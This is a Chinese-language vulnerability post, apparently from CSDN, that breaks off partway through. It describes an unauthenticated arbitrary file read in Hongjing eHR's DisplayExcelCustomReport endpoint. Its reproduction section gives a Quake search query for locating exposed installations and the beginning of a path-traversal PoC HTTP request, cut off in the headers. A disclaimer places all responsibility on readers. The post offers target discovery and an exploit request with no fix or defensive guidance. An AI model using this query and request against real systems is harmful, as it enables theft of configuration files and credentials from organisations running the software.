免责声明 由于传播、利用本CSDN所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!
一、产品介绍
宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。
二、漏洞描述
宏景eHR DisplayExcelCustomReport接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统敏感信息文件、数据库配置文件等等,导致网站处于极度不安全状态。
三、漏洞危害
未经身份验证攻击者可通过该漏洞读取系统敏感信息文件、数据库配置文件等等,导致网站处于极度不安全状态。
四、漏洞复现
quake:app:"HJSOFT-HCM"
POC
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: url
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C